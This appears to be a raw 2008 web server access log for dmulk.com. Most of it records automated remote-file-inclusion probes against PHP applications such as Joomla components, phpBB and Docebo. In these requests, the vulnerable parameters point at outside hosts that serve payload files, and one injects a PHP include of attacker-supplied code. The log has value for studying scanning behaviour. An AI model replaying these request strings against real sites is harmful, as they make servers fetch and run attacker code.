66.90.73.113 - - [10/Aug/2008:12:54:54 -0700] "GET //index1.php?site=%20http://h1.ripway.com/rombongan/osy.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
117.200.48.200 - - [10/Aug/2008:12:54:54 -0700] "GET /blog/index.php/2008/04/12/great-day-for-a-ride/ HTTP/1.1" 200 11525 "-" "-" "dmulk.com"
66.90.73.113 - - [10/Aug/2008:12:54:59 -0700] "GET /logs//index1.php?site=%20http://h1.ripway.com/rombongan/osy.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
85.214.24.238 - - [10/Aug/2008:12:55:03 -0700] "GET /logs/access_080226.log//components/errors.php?error=http://vncx.t35.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
213.254.226.234 - - [10/Aug/2008:12:55:03 -0700] "GET /logs/access_080114.log//components/errors.php?error=http://vncx.t35.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
85.214.24.238 - - [10/Aug/2008:12:55:03 -0700] "GET //components/errors.php?error=http://vncx.t35.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
85.214.24.238 - - [10/Aug/2008:12:55:03 -0700] "GET /logs//components/errors.php?error=http://vncx.t35.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
85.214.24.238 - - [10/Aug/2008:12:55:10 -0700] "GET /logs/access_080114.log//components/errors.php?error=http://vncx.t35.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
66.90.73.113 - - [10/Aug/2008:12:55:11 -0700] "GET /logs/access_080311.log//index1.php?site=%20http://h1.ripway.com/rombongan/osy.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
190.54.62.66 - - [10/Aug/2008:12:55:18 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.spanishvida.com/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.214.24.238 - - [10/Aug/2008:12:55:20 -0700] "GET /logs/access_080114.log//components/errors.php?error=http://vncx.t35.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
190.54.62.66 - - [10/Aug/2008:12:55:23 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.spanishvida.com/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.90.73.113 - - [10/Aug/2008:12:55:25 -0700] "GET /logs/access_080120.log//protection.php?action=logout&siteurl=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
64.59.70.177 - - [10/Aug/2008:12:55:37 -0700] "GET /logs/access_080131.log/index2.php?sekce=http://www.bega-technik.de/idfx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
64.59.70.177 - - [10/Aug/2008:12:55:37 -0700] "GET /logs/index2.php?sekce=http://www.bega-technik.de/idfx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
64.59.70.177 - - [10/Aug/2008:12:55:37 -0700] "GET /index2.php?sekce=http://www.bega-technik.de/idfx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
81.177.3.99 - - [10/Aug/2008:12:55:37 -0700] "GET /logs/access_080131.log/index2.php?sekce=http://arabhack.fateback.com/kngid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
81.177.3.99 - - [10/Aug/2008:12:55:38 -0700] "GET /index2.php?sekce=http://arabhack.fateback.com/kngid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
81.177.3.99 - - [10/Aug/2008:12:55:38 -0700] "GET /logs/index2.php?sekce=http://arabhack.fateback.com/kngid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
85.214.24.238 - - [10/Aug/2008:12:56:14 -0700] "GET //components/errors.php?error=http://vncx.t35.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
213.254.226.234 - - [10/Aug/2008:12:56:24 -0700] "GET //components/errors.php?error=http://vncx.t35.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
208.98.1.156 - - [10/Aug/2008:12:56:41 -0700] "GET //convert/mvcw.php?step=1&vwar_root=http://juegos0nline.webcindario.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.98.1.156 - - [10/Aug/2008:12:56:41 -0700] "GET /logs/access_080127.log//convert/mvcw.php?step=1&vwar_root=http://juegos0nline.webcindario.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.98.1.156 - - [10/Aug/2008:12:56:41 -0700] "GET /logs//convert/mvcw.php?step=1&vwar_root=http://juegos0nline.webcindario.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.73.189.205 - - [10/Aug/2008:12:56:41 -0700] "GET /logs/access_080127.log//convert/mvcw.php?step=1&vwar_root=http://www.desperate-souls.com/templates/portax/images/media/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.73.189.205 - - [10/Aug/2008:12:56:41 -0700] "GET //convert/mvcw.php?step=1&vwar_root=http://www.desperate-souls.com/templates/portax/images/media/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.73.189.205 - - [10/Aug/2008:12:56:41 -0700] "GET /logs//convert/mvcw.php?step=1&vwar_root=http://www.desperate-souls.com/templates/portax/images/media/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.73.189.205 - - [10/Aug/2008:12:56:42 -0700] "GET /logs/access_080219.log//convert/mvcw.php?step=1&vwar_root=http://www.desperate-souls.com/templates/portax/images/media/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.90.73.113 - - [10/Aug/2008:12:56:46 -0700] "GET /logs//protection.php?action=logout&siteurl=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
66.90.73.113 - - [10/Aug/2008:12:56:47 -0700] "GET //protection.php?action=logout&siteurl=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
208.98.1.156 - - [10/Aug/2008:12:56:48 -0700] "GET /logs/access_080219.log//convert/mvcw.php?step=1&vwar_root=http://juegos0nline.webcindario.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.194.76.177 - - [10/Aug/2008:12:57:28 -0700] "GET /logs/access_080201.log//convert/mvcw.php?step=1&vwar_root=http://www.spanishvida.com/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.177.3.99 - - [10/Aug/2008:12:57:32 -0700] "GET /logs/access_080226.log//index.php?lang=http://arabhack.fateback.com/kngid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
81.177.3.99 - - [10/Aug/2008:12:57:34 -0700] "GET /logs/access_080226.log//index.php?lang=http://arabhack.fateback.com/kngid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
64.59.70.177 - - [10/Aug/2008:12:57:35 -0700] "GET /plugins/safehtml/safehtml.php?dir[plugins]=http://www.bega-technik.de/idfx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
64.59.70.177 - - [10/Aug/2008:12:57:35 -0700] "GET /logs/access_080724.log/plugins/safehtml/safehtml.php?dir[plugins]=http://www.bega-technik.de/idfx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
64.59.70.177 - - [10/Aug/2008:12:57:35 -0700] "GET /logs/plugins/safehtml/safehtml.php?dir[plugins]=http://www.bega-technik.de/idfx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
66.90.73.113 - - [10/Aug/2008:12:57:54 -0700] "GET /logs//protection.php?action=logout&siteurl=%20http://h1.ripway.com/rombongan/osy.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
85.214.24.238 - - [10/Aug/2008:12:57:55 -0700] "GET /logs/access_080219.log/errors.php?error=http://vncx.t35.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
85.214.24.238 - - [10/Aug/2008:12:57:56 -0700] "GET /errors.php?error=http://vncx.t35.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
85.214.24.238 - - [10/Aug/2008:12:57:56 -0700] "GET /logs/errors.php?error=http://vncx.t35.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
66.90.73.113 - - [10/Aug/2008:12:57:57 -0700] "GET /logs//protection.php?action=logout&siteurl=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
66.90.73.113 - - [10/Aug/2008:12:57:57 -0700] "GET //protection.php?action=logout&siteurl=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
66.90.73.113 - - [10/Aug/2008:12:57:59 -0700] "GET //protection.php?action=logout&siteurl=%20http://h1.ripway.com/rombongan/osy.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
153.19.161.46 - - [10/Aug/2008:12:58:12 -0700] "GET /logs/access_080311.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
153.19.161.46 - - [10/Aug/2008:12:58:12 -0700] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
153.19.161.46 - - [10/Aug/2008:12:58:12 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
153.19.161.46 - - [10/Aug/2008:12:58:16 -0700] "GET /logs/access_080305.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.72.102.17 - - [10/Aug/2008:12:58:32 -0700] "GET /logs/access_080226.log//components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.newshop.ru/backup/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.72.102.17 - - [10/Aug/2008:12:58:32 -0700] "GET //components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.newshop.ru/backup/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.72.102.17 - - [10/Aug/2008:12:58:33 -0700] "GET /logs//components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.newshop.ru/backup/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.90.73.113 - - [10/Aug/2008:12:58:50 -0700] "GET /logs//protection.php?action=logout&siteurl=%20http://h1.ripway.com/rombongan/osy.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
66.90.73.113 - - [10/Aug/2008:12:58:55 -0700] "GET //protection.php?action=logout&siteurl=%20http://h1.ripway.com/rombongan/osy.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
85.214.24.238 - - [10/Aug/2008:12:59:11 -0700] "GET /logs/access_080306.log/errors.php?error=http://vncx.t35.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
85.214.24.238 - - [10/Aug/2008:12:59:14 -0700] "GET /errors.php?error=http://vncx.t35.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
64.59.70.177 - - [10/Aug/2008:12:59:18 -0700] "GET /logs/access_080714.log/plugins/safehtml/safehtml.php?dir[plugins]=http://www.bega-technik.de/idfx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
212.72.102.17 - - [10/Aug/2008:12:59:22 -0700] "GET /logs/access_080226.log//components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.newshop.ru/backup/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.72.102.17 - - [10/Aug/2008:12:59:23 -0700] "GET //components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.newshop.ru/backup/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.72.102.17 - - [10/Aug/2008:12:59:23 -0700] "GET /logs//components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.newshop.ru/backup/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.177.3.99 - - [10/Aug/2008:12:59:28 -0700] "GET /logs/access_080131.log/index2.php?sekce=http://arabhack.fateback.com/kngid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
81.177.3.99 - - [10/Aug/2008:12:59:28 -0700] "GET /index2.php?sekce=http://arabhack.fateback.com/kngid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
81.177.3.99 - - [10/Aug/2008:12:59:29 -0700] "GET /logs/index2.php?sekce=http://arabhack.fateback.com/kngid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
66.90.73.113 - - [10/Aug/2008:13:00:44 -0700] "GET /logs//index1.php?site=%20http://h1.ripway.com/rombongan/osy.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
66.90.73.113 - - [10/Aug/2008:13:00:45 -0700] "GET //index1.php?site=%20http://h1.ripway.com/rombongan/osy.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
190.54.62.66 - - [10/Aug/2008:13:01:06 -0700] "GET /logs/access_080309.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.spanishvida.com/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.73.189.205 - - [10/Aug/2008:13:01:17 -0700] "GET /logs/access_080127.log%20//convert/mvcw.php?step=1&vwar_root=http://www.desperate-souls.com/templates/portax/images/media/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.98.70.18 - - [10/Aug/2008:13:02:12 -0700] "GET /logs/access_080118.log/index.php?url=http://www.topyn.com/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.6.17.183 - - [10/Aug/2008:13:02:13 -0700] "GET /bikes/GPS/WeSTOC2008/dmulk_WeSTOC08.gpx HTTP/1.0" 200 196608 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
65.98.70.18 - - [10/Aug/2008:13:02:17 -0700] "GET /logs/index.php?url=http://www.topyn.com/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
65.98.70.18 - - [10/Aug/2008:13:02:18 -0700] "GET /index.php?url=http://www.topyn.com/ips.txt?? HTTP/1.1" 200 18377 "-" "libwww-perl/5.811" "www.dmulk.com"
66.90.73.113 - - [10/Aug/2008:13:02:52 -0700] "GET /logs//index1.php?site=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
66.90.73.113 - - [10/Aug/2008:13:02:52 -0700] "GET //index1.php?site=http://artyficio.com/new/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
216.245.192.26 - - [10/Aug/2008:13:02:59 -0700] "GET /logs/access_080122.log//errors.php?error=http://www.v8rx7forum.com/includes/paymentapi/log.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
153.19.161.46 - - [10/Aug/2008:13:03:01 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
153.19.161.46 - - [10/Aug/2008:13:03:01 -0700] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
153.19.161.46 - - [10/Aug/2008:13:03:07 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
153.19.161.46 - - [10/Aug/2008:13:03:07 -0700] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.235.216.69 - - [10/Aug/2008:13:03:27 -0700] "GET / HTTP/1.0" 200 18241 "-" "Mozilla/3.0 (compatible)" "www.dmulk.com"
85.214.24.238 - - [10/Aug/2008:13:03:50 -0700] "GET /logs/access_080227.log//newspublish/include.php?path%5Bdocroot%5D=http://vncx.t35.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
85.214.24.238 - - [10/Aug/2008:13:03:51 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://vncx.t35.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
85.214.24.238 - - [10/Aug/2008:13:03:51 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://vncx.t35.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
190.54.62.66 - - [10/Aug/2008:13:04:11 -0700] "GET /port.php?content=http://www.spanishvida.com/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.214.24.238 - - [10/Aug/2008:13:04:24 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://vncx.t35.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
190.54.62.66 - - [10/Aug/2008:13:04:34 -0700] "GET /logs/access_080315.log/index.php?fn=http://www.spanishvida.com/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.86.236.106 - - [10/Aug/2008:13:04:35 -0700] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.ds5vxk.com/board/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.86.236.106 - - [10/Aug/2008:13:04:35 -0700] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.ds5vxk.com/board/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.86.236.106 - - [10/Aug/2008:13:04:35 -0700] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.ds5vxk.com/board/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.86.236.106 - - [10/Aug/2008:13:04:35 -0700] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.ds5vxk.com/board/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
190.54.62.66 - - [10/Aug/2008:13:04:37 -0700] "GET /index.php?fn=http://www.spanishvida.com/.../rid????? HTTP/1.1" 200 18409 "-" "libwww-perl/5.79" "www.dmulk.com"
190.54.62.66 - - [10/Aug/2008:13:04:38 -0700] "GET /logs/index.php?fn=http://www.spanishvida.com/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
190.54.62.66 - - [10/Aug/2008:13:04:57 -0700] "GET /logs/access_080120.log/index.php?fn=http://www.spanishvida.com/.../rid????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.149.247.12 - - [10/Aug/2008:13:05:03 -0700] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.ds5vxk.com/board/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.149.247.12 - - [10/Aug/2008:13:05:04 -0700] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.ds5vxk.com/board/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.72.102.17 - - [10/Aug/2008:13:05:22 -0700] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.citoyennete-active.org/mambots/content/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
212.72.102.17 - - [10/Aug/2008:13:05:24 -0700] "GET //administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.citoyennete-active.org/mambots/content/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
74.6.17.183 - - [10/Aug/2008:13:05:46 -0700] "GET /logs/access_070720.log HTTP/1.0" 200 29646 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
213.254.226.234 - - [10/Aug/2008:13:06:24 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://vncx.t35.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
65.55.213.30 - - [10/Aug/2008:13:06:33 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" "dmulk.com"
65.55.213.30 - - [10/Aug/2008:13:06:35 -0700] "GET /logs/access_080209.log HTTP/1.0" 200 1293550 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" "dmulk.com"
213.149.247.12 - - [10/Aug/2008:13:06:37 -0700] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.ds5vxk.com/board/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.72.102.17 - - [10/Aug/2008:13:06:37 -0700] "GET /logs/access_080131.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.newshop.ru/backup/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.149.247.12 - - [10/Aug/2008:13:06:37 -0700] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.ds5vxk.com/board/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.72.102.17 - - [10/Aug/2008:13:06:38 -0700] "GET //administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.newshop.ru/backup/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.72.102.17 - - [10/Aug/2008:13:06:38 -0700] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.newshop.ru/backup/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.72.102.17 - - [10/Aug/2008:13:07:00 -0700] "GET /logs/access_071225.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.newshop.ru/backup/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.149.247.12 - - [10/Aug/2008:13:08:39 -0700] "GET /logs/access_080207.log/port.php?content=http://www.urdutimesusa.com/chicago/include/chk2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
213.149.247.12 - - [10/Aug/2008:13:08:39 -0700] "GET /port.php?content=http://www.urdutimesusa.com/chicago/include/chk2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
207.210.115.114 - - [10/Aug/2008:13:08:44 -0700] "GET /logs/access_080207.log/port.php?content=http://www.urdutimesusa.com/chicago/include/chk2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
207.210.115.114 - - [10/Aug/2008:13:08:44 -0700] "GET /port.php?content=http://www.urdutimesusa.com/chicago/include/chk2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
213.149.247.12 - - [10/Aug/2008:13:08:47 -0700] "GET /logs/access_080215.log/port.php?content=http://www.urdutimesusa.com/chicago/include/chk2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
85.214.24.238 - - [10/Aug/2008:13:08:47 -0700] "GET /logs/access.log//newspublish/include.php?path%5Bdocroot%5D=http://vncx.t35.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
194.79.75.195 - - [10/Aug/2008:13:08:57 -0700] "GET /logs/access_080313.log/?sourcedir=http://www.geocities.com/dianavirsa/new.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
194.79.75.195 - - [10/Aug/2008:13:08:58 -0700] "GET /logs/?sourcedir=http://www.geocities.com/dianavirsa/new.txt??? HTTP/1.1" 200 59997 "-" "libwww-perl/5.810" "www.dmulk.com"
207.210.115.114 - - [10/Aug/2008:13:09:04 -0700] "GET /logs/access_080215.log/port.php?content=http://www.urdutimesusa.com/chicago/include/chk2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
216.245.192.26 - - [10/Aug/2008:13:09:07 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.v8rx7forum.com/includes/paymentapi/log.txt????? HTTP/1.1" 200 50 "-" "libwww-perl/5.812" "www.dmulk.com"
212.72.102.17 - - [10/Aug/2008:13:09:11 -0700] "GET /logs/access_080122.log//components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.newshop.ru/backup/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.72.102.17 - - [10/Aug/2008:13:09:11 -0700] "GET /logs/access_080122.log//components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.newshop.ru/backup/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.24.238 - - [10/Aug/2008:13:09:14 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://vncx.t35.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
85.214.24.238 - - [10/Aug/2008:13:09:14 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://vncx.t35.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
85.214.24.238 - - [10/Aug/2008:13:09:14 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://vncx.t35.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
